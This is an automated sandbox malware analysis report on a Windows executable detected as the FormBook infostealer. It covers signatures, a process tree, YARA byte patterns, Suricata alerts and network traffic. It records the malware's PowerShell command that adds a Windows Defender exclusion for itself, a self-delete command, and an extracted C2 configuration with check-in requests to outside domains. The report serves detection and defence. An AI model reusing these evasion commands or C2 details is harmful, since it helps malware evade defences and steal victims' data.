
Windows Analysis Report
TEKL#U0130F #U0130ST.exe

Overview

General Information

Sample name: TEKL#U0130F #U0130ST.exe
(renamed because the original name is a hash value)
Original sample name: TEKLF ST.exe
Analysis ID: 1549204
MD5: 88153ac6837f5034a7ab44259c90f4dd
SHA1: 90085bacffa3b6a75252f9e06af2d7ac54886e75
SHA256: 23bc8acbb8a1e716512ac2ea9426d3fc46938cccac426f344c0314aafb17769e
Tags: exe user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TEKL#U0130F #U0130ST.exe (PID: 6148 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: 88153AC6837F5034A7AB44259C90F4DD)
    • powershell.exe (PID: 4424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3652 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • TEKL#U0130F #U0130ST.exe (PID: 4260 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: 88153AC6837F5034A7AB44259C90F4DD)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • mstsc.exe (PID: 3900 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • cmd.exe (PID: 6056 cmdline: /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.avada-casino-tlj.buzz/bc01/"], "decoy": ["epatitis-treatment-26155.bond", "52cy67sk.bond", "nline-degree-6987776.world", "ingxingdiandeng-2033.top", "mberbreeze.cyou", "48xc300mw.autos", "obs-for-seniors-39582.bond", "tpetersburg-3-tonn.online", "egafon-parser.online", "172jh.shop", "ltraman.pro", "bqfhnys.shop", "ntercash24-cad.homes", "uhtwister.cloud", "alk-in-tubs-27353.bond", "ucas-saaad.buzz", "oko.events", "8080713.xyz", "refabricated-homes-74404.bond", "inaa.boo", "nnevateknoloji.xyz", "ar-accident-lawyer-389.today", "ianju-fvqh092.vip", "ealthandwellnessly.digital", "qzxx.top", "q8189.top", "ecurity-service-22477.bond", "ractors-42621.bond", "astamadre.shop", "tonomushotel.xyz", "cowatt.fun", "olocaustaffirmer.net", "delphi.ltd", "mmwinni.buzz", "8009.top", "nline-gaming-ox-fr.xyz", "irtyeffingrancher.info", "omotech-dz.net", "akemoneyonline.bond", "ustbookin.online", "eals.lat", "irmag.online", "eddogbrands.website", "oifulcares.net", "aming-chair-83359.bond", "ewferg.top", "areless.net", "torygame168.online", "y-language-menu.net", "iring-cleaners-2507.xyz", "inancialenlightment.info", "ar-accident-lawyer-389.today", "sicologosportugueses.online", "ajabandot.website", "oidakings.net", "2ar1.shop", "comedia.lol", "kjbrosmm.shop", "ffpage.shop", "nfluencer-marketing-17923.bond", "ebshieldsrenew.live", "lkjuy.xyz", "lussalesapp.website", "hildrens-clothing.today"]}
Source | Rule | Description | Author | Strings
00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source | Rule | Description | Author | Strings
4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1f2b9:$a1: E9 92 9D FF FF C3 E8
4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe, ParentProcessId: 6148, ParentProcessName: TEKL#U0130F #U0130ST.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ProcessId: 4424, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe, ParentProcessId: 6148, ParentProcessName: TEKL#U0130F #U0130ST.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ProcessId: 4424, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe, ParentProcessId: 6148, ParentProcessName: TEKL#U0130F #U0130ST.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe", ProcessId: 4424, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T12:28:47.553120+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.8 | 49712 | TCP
2024-11-05T12:29:25.966033+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.8 | 49717 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T12:29:47.524742+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49784 | 185.26.122.70 | 80 | TCP


AV Detection

Source: http://www.ewferg.top/bc01/ | Avira URL Cloud: Label: malware
Source: http://www.ewferg.top/bc01/www.52cy67sk.bond | Avira URL Cloud: Label: malware
Source: http://www.ewferg.top | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.avada-casino-tlj.buzz/bc01/"], "decoy": ["epatitis-treatment-26155.bond", "52cy67sk.bond", "nline-degree-6987776.world", "ingxingdiandeng-2033.top", "mberbreeze.cyou", "48xc300mw.autos", "obs-for-seniors-39582.bond", "tpetersburg-3-tonn.online", "egafon-parser.online", "172jh.shop", "ltraman.pro", "bqfhnys.shop", "ntercash24-cad.homes", "uhtwister.cloud", "alk-in-tubs-27353.bond", "ucas-saaad.buzz", "oko.events", "8080713.xyz", "refabricated-homes-74404.bond", "inaa.boo", "nnevateknoloji.xyz", "ar-accident-lawyer-389.today", "ianju-fvqh092.vip", "ealthandwellnessly.digital", "qzxx.top", "q8189.top", "ecurity-service-22477.bond", "ractors-42621.bond", "astamadre.shop", "tonomushotel.xyz", "cowatt.fun", "olocaustaffirmer.net", "delphi.ltd", "mmwinni.buzz", "8009.top", "nline-gaming-ox-fr.xyz", "irtyeffingrancher.info", "omotech-dz.net", "akemoneyonline.bond", "ustbookin.online", "eals.lat", "irmag.online", "eddogbrands.website", "oifulcares.net", "aming-chair-83359.bond", "ewferg.top", "areless.net", "torygame168.online", "y-language-menu.net", "iring-cleaners-2507.xyz", "inancialenlightment.info", "ar-accident-lawyer-389.today", "sicologosportugueses.online", "ajabandot.website", "oidakings.net", "2ar1.shop", "comedia.lol", "kjbrosmm.shop", "ffpage.shop", "nfluencer-marketing-17923.bond", "ebshieldsrenew.live", "lkjuy.xyz", "lussalesapp.website", "hildrens-clothing.today"]}
Source: TEKL#U0130F #U0130ST.exe | ReversingLabs: Detection: 34%
Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: TEKL#U0130F #U0130ST.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_008010C5 CryptProtectData,LocalAlloc,memcpy,LocalFree | 8_2_008010C5
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_00801187 CryptUnprotectData,LocalAlloc,memcpy,LocalFree | 8_2_00801187
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0080F157 CryptMsgOpenToDecode,GetLastError,GetLastError,CryptMsgUpdate,GetLastError,GetLastError,CertOpenStore,CryptMsgClose | 8_2_0080F157
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_008012E0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree | 8_2_008012E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_00801248 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree | 8_2_00801248
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007E8511 CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext | 8_2_007E8511
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_008876CC CryptDecodeObject,LocalAlloc,CryptDecodeObject,LocalFree,GetLastError | 8_2_008876CC
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0080E8E0 CryptVerifyDetachedMessageSignature,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CertFreeCertificateChain,CertCloseStore | 8_2_0080E8E0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0080A940 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree | 8_2_0080A940
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0080AAC0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree | 8_2_0080AAC0
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007D3C2A memset,CryptUIDlgViewCertificateW,GetLastError | 8_2_007D3C2A
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0080DE70 memset,RegOpenKeyExW,RegQueryValueExW,malloc,RegQueryValueExW,wcstombs_s,malloc,wcstombs_s,CryptSignMessage,GetLastError,GetLastError,LocalAlloc,CryptSignMessage,GetLastError,GetLastError,LocalFree,CertFreeCertificateChain,free,free,RegCloseKey | 8_2_0080DE70
Source: TEKL#U0130F #U0130ST.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: TEKL#U0130F #U0130ST.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: rFP.pdb source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130ST.exe, TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rFP.pdbSHA256 source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: mstsc.pdbGCTL source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: mstsc.pdb source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007D26C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose | 8_2_007D26C7
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4x nop then pop edi | 4_2_0040E461

Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49784 -> 185.26.122.70:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49784 -> 185.26.122.70:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.8:49784 -> 185.26.122.70:80
Source: C:\Windows\explorer.exe | Network Connect: 185.26.122.70 80
Source: Malware configuration extractor | URLs: www.avada-casino-tlj.buzz/bc01/
Source: global traffic | HTTP traffic detected: GET /bc01/?DbJ=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObH0Tqfvq8jqw&P2J=ejoHnvmXAnKhhd HTTP/1.1 Host: www.oko.events Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | ASN Name: HOSTLANDRU HOSTLANDRU
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49717
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49712
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 6_2_0DEACF82 getaddrinfo,setsockopt,recv | 6_2_0DEACF82
Source: global traffic | HTTP traffic detected: GET /bc01/?DbJ=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObH0Tqfvq8jqw&P2J=ejoHnvmXAnKhhd HTTP/1.1 Host: www.oko.events Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | DNS traffic detected: DNS query: www.2ar1.shop
Source: global traffic | DNS traffic detected: DNS query: www.obs-for-seniors-39582.bond
Source: global traffic | DNS traffic detected: DNS query: www.oko.events
Source: global traffic | DNS traffic detected: DNS query: www.aming-chair-83359.bond
Source: global traffic | DNS traffic detected: DNS query: www.refabricated-homes-74404.bond
Source: global traffic | DNS traffic detected: DNS query: www.nline-degree-6987776.world
Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.0000000009237000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000006.00000000.1561108921.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2808794232.0000000004405000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000002.2814156946.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2807627861.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1565613332.0000000007720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: TEKL#U0130F #U0130ST.exe, 00000000.00000002.1552438954.000000000338B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TEKL#U0130F #U0130ST.exe | String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.2ar1.shop
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.2ar1.shop/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.2ar1.shop/bc01/www.obs-for-seniors-39582.bond
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.2ar1.shopReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.52cy67sk.bond
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.52cy67sk.bond/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.52cy67sk.bond/bc01/MMfl
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.52cy67sk.bondReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ajabandot.website
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ajabandot.website/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ajabandot.website/bc01/www.y-language-menu.net
